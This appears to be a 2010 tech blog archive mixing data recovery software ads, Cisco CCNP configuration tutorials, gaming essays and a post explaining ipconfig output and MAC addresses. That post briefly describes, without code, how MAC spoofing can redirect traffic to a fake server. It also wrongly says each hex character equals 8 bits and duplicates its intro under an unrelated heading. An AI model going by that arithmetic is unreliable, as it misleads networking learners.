Don't panic! Everything may not be lost just yet, and you may be able to recover all information without a sweat. To maximize your chances of successful recovery, minimize your activity on the computer where the lost files were. While you cannot be completely sure that Windows does not write anything on the disk that stores your lost files, the goal is essentially to limit disk write operations until you get back all important data from that disk. Any data that's written on a disk that contains deleted or inaccessible data on it can, and probably will, overwrite the deleted files on the disk and destroy information that was stored in them.

Anecdotally, one of the worst things you can do is looking for a tool that will undelete or recover your XLS files, installing and trying out such tools in action. On a typical PC, any Web page you open in a browser will cause several file writes to a hard drive, reducing your chances of successful data recovery. Any program that you download or install is also written to your hard disk. Finally, as not all products are equal, running a wrong type of data recovery application bears an unacceptably high risk of losing your lost Excel spreadsheets forever.

DiskInternals Excel Recovery is designed specifically to find and recover Microsoft Excel XLS spreadsheets safely and securely, no matter how badly your hard drive or the file system are damaged. If you simply deleted an XLS file, DiskInternals Excel Recovery will look up the file system to find all XLS files that were deleted recently, and test each file for the possibility of successful recovery. In bad cases or if your hard drive crashed or the file system is corrupt, DiskInternals Excel Recovery will scan entire hard drive's surface in order to locate Microsoft Excel spreadsheets that aren't marked in the file system. The product uses a list of signatures associated with Microsoft XLS file format in order to detect precisely the beginning and end of each and every Microsoft Excel spreadsheet on your hard disk, extracts and validates their contents and metadata on the fly. This method works even on disks that are completely inaccessible in Windows!

The product matches the results obtained with the file system scan against those obtained by scanning surface of the hard disk, and displays the complete list of recoverable Excel spreadsheets along with their file names, metadata and contents, giving you the best possibility of successful recovery.

If you only need to recover the latest version of an Excel spreadsheet, you can use "On the Fly" filters that allow to only showing XLS files with specific title, created by specific author, or the files that contain certain text, are of a certain size, or are last saved on a specific date. The free version of DiskInternals Excel Recovery allows full file preview to ensure that you can recover exactly the files you need.

Download and try an evaluation version for free from http://www.diskinternals.com/. You only need to purchase when you see for yourself that DiskInternals Excel Recovery provides you complete recovery of your XLS files in your particular circumstances.

Cisco CCNP - BCMSN Exam Tutorial: Spanning Tree Protocol (STP) Timers

2010-09-04T01:51:00.000-05:00

In your BCMSN / CCNP exam study, it's easy to overlook some of the details of Spanning Tree Protocol (STP). After all, you learned all of that in your CCNA studies, right? Not necessarily! While some of the BCMSN material will be a review for you, there are some details regarding familiar topics that you need to learn. That includes the timers for STP - Hello Time, MaxAge, and Forward Delay.

You may remember these timers from your CCNA studies as well, and you should also remember that these timers should not be changed lightly. What you might not have known is that if you decide to change any and all of these timers, that change must be configured on the root bridge! The root bridge will inform the nonroot switches of the change via BPDUs.

Hello Time is the interval between BPDUs, two seconds by default.

Forward Delay is the length of both the listening and learning STP stages, with a default value of 15 seconds.

Maximum Age, referred to by the switch as MaxAge, is the amount of time a switch will retain a BPDU's contents before discarding it. The default is 20 seconds.

The value of these timers can be changed with the spanning-tree vlan command shown below. Verify the changes with the show spanning-tree command.

SW1(config)#spanning-tree vlan 1 ?

forward-time Set the forward delay for the spanning tree

hello-time Set the hello interval for the spanning tree

max-age Set the max age interval for the spanning tree

priority Set the bridge priority for the spanning tree

root Configure switch as root

SW1(config)#spanning-tree vlan 1 hello-time 5

SW1(config)#spanning-tree vlan 1 max-age 30

SW1(config)#spanning-tree vlan 1 forward-time 20

SW1(config)#^Z

SW1#show spanning-tree vlan 1

VLAN0001

Spanning tree enabled protocol ieee

Root ID Priority 32769

Address 000f.90e1.c240

This bridge is the root

Hello Time 5 sec Max Age 30 sec Forward Delay 20 sec

Bridge ID Priority 32769 (priority 32768 sys-id-ext 1)

Address 000f.90e1.c240

Hello Time 5 sec Max Age 30 sec Forward Delay 20 sec

Aging Time 300

Interface Role Sts Cost Prio.Nbr Type

---------------- ---- --- --------- -------- --------------------------------

Fa0/11 Desg FWD 19 128.11 P2p

Fa0/12 Desg FWD 19 128.12 P2p

Again, you should always take great care in changing these timers. Those defaults are set for a reason - helping to prevent switching loops!

Should We Have An External Back Up

2010-09-01T23:41:00.000-05:00

Technology has certainly come a long way in the past few decades. Gone are the huge contraptions that used to characterize computers. Nowadays, you can easily purchase a notebook computer that weighs in at less than 6 pounds. However, one thing hasn't changed. Hard drives still occasionally crash and frustrated users are left trying to figure out just how to do hard drive data recovery on their own.

Hard drives aren't perfect, although they're amazing examples of mechanical engineering. Physical damage can easily occur since these disks are spinning at such high speeds. The smallest interference while in use can cause damage in certain areas. Various features have been put into place to reduce the likelihood of a critical hard drive failure, but these are not 100% effective. Sadly, physical damage isn't the only reason why you may need to attempt hard drive data recovery. Many people accidentally wipe out their hard drives because they're not sure what they're doing.

If you do know a good deal about computers, and are not the one who messed up the hard drive in the first place, it may be possible for you to do your own hard drive data recovery. Keep in mind that to do this, you may need to fix your master boot record, or retrieve data from a physically damaged disk. If you can't do this, then you'll need to employ the services of a hard drive data recovery expert. Actually, if your system crashes and you don't actually recover data for a living, I'd suggest you go straight to a hard drive data recovery expert. One thing though…they're expensive. Come on, these guys are specialized in what they do. You didn't really expect that any hard drive data recovery expert would do it for free, did you?

You know what can really help you save money if your hard drive does crash? Backing up your data. It seems like such a sensible thing to do, doesn't it? Some users partition their hard drive. This makes it easy for you to do your hard drive data recovery because chances are only one partition will fail. If you've backed up your files, you can continue working or, better yet, you can save them to an external source and get a new hard drive. You should definitely invest in an external back up. Yes, it's an inconvenience to remember to back up important files, but at least you won't have to pay for a hard drive data recovery expert.

Who Plays World Of Warcraft

2010-09-01T23:35:00.000-05:00

World of Warcraft has developed an enormous following since its release in November 2004. It has built upon its initial success to become an enduring and hugely popular title. The demand for the game has been stronger than its creators might have expected, and it is now a fully-fledged social phenomenon, attracting all kinds of people to its world.

World of Warcraft has enjoyed global success and acclaim. It seemed natural that it would do well in America, where there was anticipation for a new Warcraft title. The truth though is that it has taken off everywhere it has been released. It has been a massive hit in Asia, Australia, Canada, and Europe, and has many international fans and subscribers. The game has a simple, universal appeal that transcends language barriers and geography.

One of World of Warcraft's strengths is that it appeals to both casual gamers and more experienced players. The game has made the online multiplayer genre more accessible to people who might not normally play it. A lot of people who try the game may have regarded the genre as too complex or may not have played a role-playing game before. It is the quality of World of Warcraft and the buzz surrounding it that has drawn people's attention towards it.

World of Warcraft has a huge following on the Internet. There is an official site that is busy and informative and contains forums for the game's subscribers. There are many other fan sites as well. It has a keen fan base made up of a broad cross section of society. People enjoy the game for all sorts of reasons, with fans citing the gorgeous graphics, addictive gameplay and unique characters as elements they find appealing.

Although World of Warcraft has the visual style of a cartoon, it is a game that people of any age can enjoy. All age groups play it, from children to seniors. This leads to an interesting online environment, as younger players interact with older gamers. It is a real mix of people, as children and teenagers share the game's world with twenty year olds and more mature, middle-aged players and older. It is a friendly, lively environment and tends to be good-natured and welcoming.

The World of Warcraft universe is a happy, thriving community. There is a strong social aspect to it and players can become friends with each other. The game's world of Azeroth follows the real world's calendar and so they mark holidays and seasonal events in the game. On New Year's Eve in 2005 there were parties and celebrations in Azeroth that all players could attend. It is features like this that make its world much more vivid, colourful and convincing

There is a fan convention for World of Warcraft. The game's developer Blizzard held an event in October 2005 named BlizzCon, for fans of Warcraft and their other titles. World of Warcraft was a major part of this event, and one of the main attractions was a preview of the game's expansion, The Burning Crusade. Some 8,000 people attended the event, which is expected to become an annual occurrence. Families went together and fans dressed up in costume as their favourite characters from the game.

World of Warcraft has caught people's imagination and this has led to a variety of creative offshoots. One key sign of the game's popularity is the existence of Warcraft fan fiction. Players like to write fictional stories about the characters and events of the game. Fan art is also popular. People draw and paint images inspired by the game and post them in galleries online. Blizzard run their own Fan Art Program that fans can submit their art to for display. There is great creativity and beauty there.

The broad appeal of World of Warcraft is such that it has infiltrated popular culture. The game has been used as an answer on the quiz show Jeopardy. It also has celebrity admirers. The comedian Dave Chappelle is a fan. Chappelle talked about the game during a stand-up performance in San Francisco in 2005. "You know what I've been playing a lot of?" the comedian reportedly asked the audience, "World of Warcraft!" He praised the game and expressed his delight with it.

World of Warcraft then is a game that has broken new ground to appeal to a great number of people in society. With more than five million subscribers, it is now the most popular online role-playing game and has grown far beyond its cult origins. Its wide appeal speaks of the brilliance of the game itself.

Video Game Violence

2010-09-01T20:54:00.000-05:00

According to Patrick Masell, recently the media has bombarded Americans with images and stories concerning a popular and morally corrupt video game called "Grand Theft Auto." GTA 3 and its sequel GTA: Vice City has sparked record sales as well as protests and news reports across the globe. Most of these reports and protests question the game's graphic content and the effects it may have on its audience, especially teenagers.

However, GTA was not the first series of video games to create such a stir in this country. "Mortal Kombat" a fighting game known for its amount of blood and gore deaths, hit arcades in 1992 and home consoles the next year. The question of how graphic violence in video games influences this nation's youth have been debated for over a decade. Violent video games have few, if any, adverse effects on the vast majority of its audience and those who are negatively influenced often are unstable to begin with.

Two features of video games fuel renewed interest by researchers, public policy makers, and the general public. First, the active role required by video games is a double-edged sword. It helps educational video games be excellent teaching tools for motivational and learning process reasons. But, it also may make violent video games even more hazardous than violent television or cinema. Second, the arrival of a new generation of ultraviolent video games beginning in the early 1990s and continuing unabated to the present resulted in large numbers of children and youths actively participating in entertainment violence that went way beyond anything available to them on television or in movies. Recent video games reward players for killing innocent bystanders, police, and prostitutes, using a wide range of weapons including guns, knives, flame throwers, swords, baseball bats, cars, hands, and feet. Some include cut scenes (i.e., brief movie clips supposedly designed to move the story forward) of strippers. In some, the player assumes the role of hero, whereas in others the player is a criminal.

All of these actually will help to promote violence behaviour among the children but censoring or banning video games will not solve or even help a problem that is much more deeply rooted. Parents should play a major role in coping with this matter. Parental neglect is possibly the largest factor in juvenile delinquency. Ironically, the same parents who favor censorship of video games probably don't even realize the games their children are playing are meant for adults to begin with. There is something labeled on every game box called an ESRB rating. Acting like a rating system for movies, it determines the age group that a particular game is appropriate for. The GTA series is M or mature, suitable for people seventeen or over.

Yet that doesn't stop parents from buying it for their underage kids. In fact, there are many instances where a teenager will be refused from buying a certain game. Their parents are brought in to confront the store manager and the manger explains the rating system, but the parent buys the game nonetheless. So basically both parents and game creator should be blame as they did not think twice before doing something

Finding Your MAC Address On Wired And Wireless Network Cards

2010-09-01T02:06:00.000-05:00

The Answer To The Media Access Control Question
----------------------------
Over the past few weeks I have received quite a few e-mails about Ethernet cards, both wired and wireless, and more specifically, about Media Access Control (MAC) addresses. I think the main reason I've received so many questions about Ethernet cards and MAC addresses is people trying to secure their home wireless networks and their desire to use MAC address filtering. This type of filtering in wireless networks can be configured to allow or deny specific computers to use or attach to the wireless network, based on the MAC address.

My first thought was to write an article just about MAC addresses and wireless Ethernet. After thinking about it I decided to expand on this and go over some specific information about Ethernet cards and communication.

Different Ways Of Finding Your MAC Address And More
--------------------------------------------------
There are several ways of finding your Ethernet and communications protocol information. Many Ethernet card manufacturer's have proprietary software that can reveal this information but they work differently depending on the manufacturer. So we will use the Windows 2000 and XP "ipconfig" utility since this is available in the majority of Windows Operating Systems.

First, go to "start" -> "run" and type "cmd" without the quotes. Then hit the enter key. At the command line type "ipconfig /all", again without the quotes. Actually, just typing ipconfig without the /all will work but will only provide you with abbreviated information regarding your network cards. An example of what you might see by typing the "ipconfig /all" command is below with each item commented in green lettering:

Fault Tolerant And Highly Availability Computer Systems
----------------------------
There are several ways of finding your Ethernet and communications protocol information. Many Ethernet card manufacturer's have proprietary software that can reveal this information but they work differently depending on the manufacturer. So we will use the Windows 2000 and XP "ipconfig" utility since this is available in the majority of Windows Operating Systems.

First, go to "start" -> "run" and type "cmd" without the quotes. Then hit the enter key. At the command line type "ipconfig /all", again without the quotes. Actually, just typing ipconfig without the /all will work but will only provide you with abbreviated information regarding your network cards. An example of what you might see by typing the "ipconfig /all" command is below:

OutPut Of The "Ipconfig /All" Command
----------------------------------------------------------
Windows IP Configuration

Host Name . . . . . . . . . . . . : Home Computer
This is the name of your computer, typically defined during the windows installation. However, it can be changed after installation.

Primary Dns Suffix . . . . . . . : domain.com
If your computer participates in a network such as a Microsoft Windows domain this item may contain the name of the domain.

Node Type . . . . . . . . . . . . : Unknown
The Node Type may say Unknown, or peer-to-peer, or in some cases "hybrid". It is a setting that has to do with the Windows Internet Naming Services used in certain types of Windows domain networks.

IP Routing Enabled. . . . . . . . : No
This setting determines if Windows XP or 2000 will function as an IP router. If you have two or more network cards you can setup your system to act as a router, forwarding communications requests from one network to another. Windows 2000 can be configured to do this in a pretty straight forward fashion; Windows XP will need a registry modification.

WINS Proxy Enabled. . . . . . . . : No
WINS Proxy is another setting that is related to the "Node Type" we discussed earlier. It is normally not a required setting in a home or small office network, or newer types of Microsoft Windows domains.

Ethernet adapter Wireless Network Connection 2:
If you have multiple Ethernet (network) cards in your systems, as I do in this laptop, you will have multiple listings. This one happens to be the second Ethernet card, an internal wireless Ethernet card.

Description . . . . . . . . . . . : Broadcom 802.11b/g WLAN
This is the description of the Ethernet card, usually the Name / Manufacturer and type of Ethernet card. In this case, it is a Broadcom wireless Ethernet card built into my laptop.

Physical Address. . . . . . . . . : 00-90-4B-F1-6E-4A
And here we have the MAC address. The MAC address is a 48 bit hexadecimal code and is suppose to be a totally unique address. It is 48 bits because each number or letter in hexadecimal represents 8 bits. Hexadecimal numbers range from 0,1,2,3,4,5,6,7,8,9,A,B,C,D,E, F. There are 6 alpha-numeric codes hence 6*8=48(bits). The first 3 codes identify the manufacturer of the card and the remaining codes are used to create a unique number. Theoretically there should never be a card with same MAC address on a local network. However, there are a few exceptions. There are software tools that allow you to change this code. In fact, this is a step some hackers take to attack other systems on a local network. I say local network because MAC addresses are not routable between network segments. By spoofing this address, you can impersonate another machine on the local network. Traffic that was bound for the intended target can be redirected to the hacker's machine. This is the address you would also use to populate a MAC address, or physical address table when setting up your wireless access point to support MAC address filtering.

DHCP Enabled. . . . . . . . . . . : Yes
DHCP, or the Dynamic Host Control Protocol, if enabled means your computers IP address is being provided by a DHCP server on you network. The DHCP server could be your wireless access point, cable/dsl router, cable modem, or a server on your network. Also, if a DHCP server is not enabled on your network, your computers Operating System will auto generate a random IP address within a certain predefined range. This means you could network a group of systems together without having to manually assign the IP settings.

IP Address. . . . . . . . . . . . : 192.168.0.117
This parameter provides you with your current IP address. The address listed above is what is called a "private" address. There are certain classes of IP addresses that have been set aside for private use. This means for your internal, local, or private network at home or office. These addresses are not, or should not, be routable on the Internet. The Internet routes what are called "valid" IP addresses. Your cable/dsl router or cable modem has a valid IP address assigned to its "external" network interface. The external interface may be your phone line or cable TV cable.

Subnet Mask . . . . . . . . . . . : 255.255.255.0
The Subnet Mask is a special number, or in some sense, filter, that breaks down your IP address, in this case private IP address, into certain groups. IP addresses and Subnet Masks can be a complicated matter and would take an entire article to go over.

Default Gateway . . . . . . . . . : 192.168.0.254
The default gateway, the IP addresses listed above, is the IP address of the device that will route your request, such as when you try to browse a website, to the Internet. It is a bit more complicated than that though as gateways or routers can route traffic to various different networks, even other private networks. At your home or small office, this gateway most likely is your cable/dsl modem or router.

DHCP Server . . . . . . . . . . . : 192.168.0.49
The DHCP server, remember we talked a little about this above, is the device that assigns your computer an IP address and other information. DHCP servers can assign all kinds of information such as; Default Gateway, Domain Name Servers (DNS), IP address, Subnet Mask, Time Server, and much more.

DNS Servers . . . . . . . . . . . : 192.168.0.49, 64.105.197.58
DNS Servers are internal or external servers that resolve Fully Qualified Domain Names (FQDN), such as www.defendingthenet.com , to IP addresses. This is done because computers don't actually transmit your requests using the domain name, they use the IP address assigned to the FQDN. For most home or small office users, the primary DNS server is the IP address of your cable/dsl router. Your cable/dsl router than queries an external DNS server on the Internet to perform the actual resolution of the FQDN to IP address. The address 192.168.0.49 is an internal private device on my network whereas the 64.105.197.58 is an external public Internet DNS server and is present just in case my router has trouble performing the DNS resolution tasks.

Lease Obtained. . . . . . . . . . : Sunday, March 19, 2006 6:38:16 PM
This information tells you when your computer received its IP address and other information from a DHCP server. You will notice it says "Lease Obtained", that is because most DHCP servers only lease the IP address to you from a pool of available address. For instance, your pool may be 192.168.1.1 through 192.168.1.50. So your DHCP server has 50 IP addresses to choose from when assigning your computer its IP address.

Lease Expires . . . . . . . . . . : Wednesday, March 29, 2006 9:38:16 PM
When the IP address, assigned by the DHCP server, lease expires it will attempt to lease you the same or another IP address. This function can typically be changed on the DHCP server. For instance, on some fully functional DHCP servers, you can configure the Lease to never expire, or to expire within 1 day and so on.

Why Are MAC Addresses So Important And How Do They Work
------------------------------------------------------
To jump back to MAC address for just a bit. You may think that IP addresses are the most important thing when it comes to network communication. The reality is, MAC addresses are very important because without them computers would not be able to communicate over Ethernet networks. When a computer wants to speak with another computer on a local network, it will make a broadcast request, or ask a question, of who owns a particular IP address. For instance, your computer may say "Who is 192.168.0.254". Using the information above, my default gateway is 192.168.0.254 and will answer "I am "00-90-4B-F1-6E-4A" 192.168.0.254". It sends back its MAC address. That MAC address then goes into what is called a Address Resolution Protocol (ARP) table on your computer. You can see this information by going to the command prompt like you did above and typing "arp –a". You will get information like the following:

Internet Address Physical Address Type
192.168.0.49 00-12-17-5c-a2-27 dynamic
192.168.0.109 00-12-17-5c-a2-27 dynamic
192.168.0.112 00-0c-76-93-94-b2 dynamic
192.168.0.254 00-0e-2e-2e-15-61 dynamic

How A Hacker Can Use MAC Addresses In An Attack
----------------------------------------------
You will notice the IP addresses and to the right of them the MAC addresses. Without this information, without the MAC address, you would not be reading this article right now. MAC addresses are not routable like IP addresses. They work on your local or private network. However, devices on the Internet perform the same tasks. Routers and switches maintain a list of their peer devices MAC address just like your computers and devices on your home or office network. I mentioned above that MAC addresses can be changed in order to redirect requests. For instance, if I were on your office network and you had an internal web server that took personal information as input, I could tell your computer to go to my laptop for the web site by broadcasting my MAC address tied to the real web servers IP address. I would do this when you computer asked "Who is the "Real Web Server"". I could setup a fake web server that looks just like the real thing, and start collecting information the real web server would normally collect. You can see how dangerous this can be.

Conclusion
-----------
There are several other easy ways you can find your MAC address but they can be a little confusing if you have more than one internal network card. Most external USB, or PCMCIA wired and wireless Ethernet cards have their MAC address printed on them. In cases where the wired or wireless network card are inside your computer, such as in laptops, the MAC address is sometimes printed on the bottom of the laptop. Even Desktop systems cards that are inserted in PCI slots have the MAC address printed on the Ethernet card.

Cisco CCNP - BSCI Certification: The BGP Attribute "MED"

2010-08-30T20:50:00.003-05:00

When you're preparing to pass the BSCI exam and earn your CCNP certification, one of the biggest challenges is learning BGP. BGP is totally different from any protocol you learned to earn your CCNA certification, and one of the differences is that BGP uses path attributes to favor one path over another when multiple paths to or from a destination exist.

Notice I said "to or from". In earlier free BGP tutorials, I discussed the BGP attributes "weight" and "local preference". These attributes are used to favor one path to a destination over another; for example, if BGP AS 100 has two paths to a destination in AS 200, these two attributes can be set in AS 100 to favor one path over another. But what if AS 100 wants to inform the routers in AS 200 as to which path it should use to reach a given destination in AS 100?

That's where the BGP attribute "Multi-Exit Discriminator", or MED, comes in. The MED value can be set in AS 100 to tell AS 200 which path it should use to reach a given network in AS 100.

As with many BGP attributes, the MED can be set with a route-map. What you need to watch is that there is no "set med" value in route maps. To change the MED of a path, you need to change the metric of that path. Let's say that there are two entry paths for AS 200 to use to reach destinations in AS 100. You want AS 200 to use the 100.1.1.0/24 path over the 100.2.2.0/24 path. First, identify the two paths with two separate ACLs.

R1(config)#access-list 22 permit 100.1.1.0 0.0.0.255

R1(config)#access-list 23 permit 100.2.2.0 0.0.0.255

Next, write a route-map that assigns a lower metric to the more-desirable path.

R1(config)#route-map PREFER_PATH permit 10

R1(config-route-map)#match ip address 22

R1(config-route-map)#set metric 100

R1(config-route-map)#route-map PREFER_PATH permit 20

R1(config-route-map)#match ip address 23

R1(config-route-map)#set metric 250

Finally, apply the route-map to the neighbor or neighbors.

R1(config-route-map)#router bgp 100

R1(config-router)#neighbor 22.2.2.2 route-map PREFER_PATH out

The key points to keep in mind is that while many BGP attributes prefer a higher value, the MED is basically an external metric - and a lower metric is preferred, just as with the protocols you've already studied to earn your CCNA certification.

Game and Movie For PSP-Where To Get Them for Free

2010-08-30T20:50:00.000-05:00

So if you want to download game and movie for the PSP, you will find exactly what you need here. Sony's PSP, or Playstation Portable as it really is, is a wonderful piece of electronic equipment. It is compatible with many diverse types of media, as well as being a truly outstanding machine for gaming. A lot of people don't bother to get a PSP because of the expensive games and movies you need to buy for it, but it is possible, if you look in the right place, to pick up free game and movie for the PSP.

It is virtually common knowledge that you can use the internet to illegally download free games and movies for just about any format or game system, but it is not so well known that with the PSP, you can download free games and movies, and you can do it without breaking the law.

As you look around to try to download free game and movie for the PSP, you will usually encounter these different types of site:

A free download site. These free download sites allow you to download game and movie for the PSP, and a lot of other things as well. At first sight this seems like the answer to a game enthusiast's prayers, but it won't take long to find out that these sites are just an illusion. Most of the game and movie downloads are in a terrible condition. A good number of them won't even work, and even some of those that do will need working on. Added to this is the far more serious problem of potential danger to your computer, through viruses, trojans, and malware, and you will see that these sites are absolutely fraught with danger. As well as this, you will find that the PSP game and movie selection is very old, and you will understand why these sites are such a poor idea. You would do well to stay away from them completely.

A "free membership" service. These sites do genuinely offer you a free membership, and then they do give you access to the free game and movie downloads. What they don't bother to reveal is that each individual download has to be paid for. These sites are not honest and open about the fact that you are charged for each download. Apart from hiding their charges, these sites are not cheap anyway, so you are left wondering what exactly is the point of it all? You may as well purchase the game from an offline store, and get a disc and a box for it.

A genuine movie and game download site. These are the sites that are strongly recommended. When I first got my PSP a while ago I spent a long time just searching for a reliable, trustworthy, download site. It was very annoying at first, but now I've found some really good ones. The only slight negative factor is the upfront fee of around $30 to $40 you need to pay, but at least that is a one off. Once you have paid this once, you then have access to unlimited downloads. This system definitely works. Initially I was wary of the joining fee, but that has paid for itself many times over with all the game and movie for the PSP that I have downloaded. It is not always that easy to download MP4s from some of these sites, but a large number of the genuine ones will give you all of the software you need to get these kind of files onto your PSP.

It is my greatest hope that this guide to downloading game and movie for the PSP will prevent you from being swindled by the all too common disreputable sites. If you find a good genuine site and pay the initial joining fee, you will find that the investment will pay for itself many times over in the long run!

ZIP repair software tool

2010-08-29T21:33:00.002-05:00

Recovery Toolbox for Zip was developed to fix corrupted archives in Zip format. File compression is very popular, it is used, when forwarding large files to other PC's, it permits to reduce traffic and download time. As against other applications for Zip recovery, Recovery Toolbox for Zip uses multiple data recovery algorithms during its work. In addition, Recovery Toolbox for Zip uses data integrity check, it guarantees, that the data is repaired correctly and our customers will not face a data deformation problem. This approach of fix zip file ensures better results of repair zip, zip fix and more efficient operation.

Now, our potential customers have a great possibility to try this program before purchase. Do not lose this chance and get it for free, demo version of Recovery Toolbox for Zip can be downloaded here: http://www.recoverytoolbox.com/download/RecoveryToolboxForZipInstall.exe. Do not think, that the process of zip file repair and repair zip file is too complicated, it is divided into several easy steps, that can be performed intuitively, without reading user's manual. Recovery Toolbox for Zip is compatible with Windows 98, Windows Me, Windows NT 4.0, Windows 2000, Windows XP, Windows XP SP2, Windows 2003 and Windows Vista. Recovery Toolbox for Zip can be also applied to open password-protected archives, but this tool for zip repair cannot crack your password. Please enter the password, when you will be asked about it and Recovery Toolbox for Zip will open the file and continue the process of fix zip and zip file recovery. Please drop us a note, if you'd like to learn more about the process of zip file recovery or you need an advice about repair zip files.

Peltier Associates Breaking and Fixing Wireless Security

2010-08-29T21:23:00.002-05:00

To the information security professional wireless networking may be thought of as a four letter word to be avoided at all costs. Regardless of the security implication wireless networking can provide cost efficiency, and because of that wireless technologies are here to stay. While many in the profession believe that wireless networks can be easily compromised, this class will show how the appropriate wireless architecture with the proper security controls can make your wireless network as secure as any other remote access point into your network.

In this three day, wireless security workshop, we will examine the cutting edge of wireless technologies. The purpose of the course is to give you a full understanding of what wireless (802.11) networks are, how they work, how people find them and exploit them, and how they can be secured. This hands-on course is based on real world examples, solutions, and deployments. In this course we will actually set up and use wireless networks, determine the tools to uncover wireless networks, and also look at how to defeat the attempts to secure wireless networks.

Course Completion

Upon the completion of our CISM course, students will have:

Constructed a wireless network architecture

Install and configure 802.1x authentication using Microsoft Windows IAS and Server 2000

Install a wireless access point

Distinguish between 802.11x standards

Defeat Wired Equivalent Privacy

Key Take Aways:

An understanding of wireless networks

A CD of common tools and documentation

An ability to search the internet for updates and more information on wireless networks

Detail of Course Content The following topics will be covered:

Wireless History

Radio Frequency (RF) Fundamentals

WLAN Infrastructure

802.11 Network Architecture

802.1X Authentication

Extensible Authentication Protocol (EAP)/(LEAP)/(PEAP)

Detection Platforms

WLAN Discovery Tools

Kismet

Wireless Sniffers

Conventional Detection

Antennas

Exploiting WLANs

Securing WLANs

Other Wireless Options

Legal Issues including GLBA and ISO-17799

Four Important Commands For Your CCNA - CCNP Home Lab

2010-08-29T21:11:00.000-05:00

More CCNA and CCNP candidates than ever before are putting together their own home practice labs. It's more affordable than it ever has been, and I receive emails daily from new CCNAs and CCNPs who say it's the best thing they could have done to improve their studies.

There are some commands you can configure on your lab routers that won't necessarily be on your CCNA or CCNP exams, but they will make life a lot easier for you. Let's take a look at just a few of these.

The command "no exec" is short, yet powerful. Occasionally you'll have what is referred to as a "rogue EXEC" process tie up a line, and you end up having to continually clear lines, which disrupts your practice. If you have an access server, I highly recommend you configure this command on your lines, as shown here:

ACCESS_SERVER(con)#line 1 8

ACCESS_SERVER(con)#no exec

From your CCNA studies, you know that the command "no ip domain-lookup" prevents a Cisco router from sending a broadcast to find a DNS server anytime you enter something that is not an IOS command - and that includes mistyped commands, which happens to all of us sooner or later. Make sure to run that command in global configuration mode on all your practice routers.

There are two commands I like to configure on the console line on all my practice routers and switches. The first is "exec-timeout 0 0", which prevents you from being kicked out of enable mode and back into user exec after a few minutes of inactivity. (This doesn't sound like much, but you'll get pretty tired of typing "enable" after a while.) The first zero refers to minutes, the second zero to seconds. Setting them both to zero disables the exec-timeout function.

The second command prevents the router from interrupting the command you're typing with a console message. If you've ever been in the middle of typing a router command and suddenly you're interrupted with a logging message, you know that can be pretty annoying. We don't want the router to not display the message, but we do want the router to wait until we're done entering data. The command to perform this is "logging synchronous".

R1(config)#line console 0

R1(config-line)#exec-timeout 0 0

R1(config-line)#logging synchronous

You won't see many of these commands on your exams, but after you configure them on your home lab devices, you'll wonder how you did without them!

A Flashback from Way Back

2010-08-28T00:41:00.000-05:00

Relax. You're not having a flashback. Retro video game systems have made a massive resurgence in recent years, likely due to the fact that some kids never grow up. There seems to be a real affection among the techno-geeks out there for the original gaming systems. A cursory search of the internet will yield hundreds of results for websites dedicated to retro gaming. These systems were all the rage back in the day, and it appears that their time has come again.

Back when I was a young boy, these gaming systems were like a gift from the heavens. The only way I was able to play video games was to go downtown to the arcade. This posed a significant problem, as my parents were not too keen on the idea of letting me go downtown by myself. Furthermore, the local arcade tended to attract some shady characters. I skipped school one afternoon and went down to play Ms. Pac-Man, but I got caught by a truant officer. After that incident, my parents were only too eager to buy me the new Atari.

Man, I loved that system. The Atari 2600 had all the best games. Asteroids was, by far, my favorite game. Dude, I could play that game forever. Or so it seemed. What about Pitfall? I loved that game, too. Then, Kung-Fu Master came out! I don't think I left my bedroom for a month. At the time, I swore I wouldn't sleep until I rescued the fair Princess Victoria. Damn those knife throwers! To this day, my parents still blame that game for the decline in my grades that semester.

By the time the home video game market bottomed out in 1984, I had amassed a rather large collection of games. I sort of lost interest in video games around that time. I ended up giving my Atari and all of the games to my kid brother. I didn't play it much anymore, and I was too busy trying to get a girlfriend. In retrospect, I wish I had kept that system. I would love to spend an evening playing Space Invaders! Maybe I'll see if that arcade is still open. I wonder if girls ever go there……

Disk Recovery Wizard

2010-08-27T01:30:00.002-05:00

Important files disappeared after a system failure? Windows crashed while you were editing a Word document? Can't access a hard drive after a power outage? Unerase deleted files, recover lost documents and repair inaccessible disks and partitions on your own! Using proper disk recovery tools, you can do exactly what data recovery professionals do to recover your disk and data. Disk Recovery Wizard by http://wizardrecovery.com offers a full set of tools to successfully repair corrupted partitions and return inaccessible drives back to use.

Not sure if you can recover your disk and data yourself? Disk Recovery Wizard works completely automatically after asking you a few simple questions about the disks and files you want to recover. Its intuitive, wizard-based interface conveniently guides you through the recovery process. Being simple to use, Disk Recovery Wizard is not a simple tool. The advanced disk and data recovery algorithms make it one of the most powerful data recovery tools on the market. Any data recovery application can undelete the deleted Recycle Bin items, but only a few are able to do it after you do it over and over again. Disk Recovery Wizard carefully reconstructs your files and documents to make sure you can actually use the recovered documents, pictures and archives even if some parts of them have been overwritten with other data.

Still not convinced? Disk Recovery Wizard does not make false promises, offering you a complete Live Preview of your deleted files and documents before you pay. Just download the free evaluation version, scan your disk and select any file to see its contents immediately.

Are you on the edge of technology? Using the newest and latest hardware? Disk Recovery Wizard fully supports the huge disks of today formatted with any version of FAT or NTFS file systems in any version of Windows since the ancient Windows 95 to the newest Vista. A fully automatic data recovery is easily possible from local hard drives as well as digital photo cameras, memory cards, SD, CompactFlash, Memory Stick and USB drives. Get your copy now http://wizardrecovery.com.

Podcasting For Profit

2010-08-27T01:29:00.000-05:00

So you have a podcast. That's great, but don't quit your day job just yet. Unfortunately, unless you're Ricky Gervais it might be more than just a little difficult to make money off podcasting. If you are Ricky Gervais: A.) Can I borrow some money? B.) Can I guest star on the new video podcast?

So why aren't there more podcast millionaires? Most podcasts don't have the audience necessary to generate any significant ad revenue. The other problem being that as podcasting grows, so do the number of shows targeting the same audience. The larger and more successful podcasts can generate revenue by charging subscription fees for their shows, or even by charging for the back catalogue of shows. Even amongst the larger corporations, excepting The Wall Street Journal, and Consumer Reports, most haven't been able to sell enough subscriptions to their web-based content to be anywhere close to profitable. Apparently just having a recognizable brand isn't enough to sell subscriptions alone.

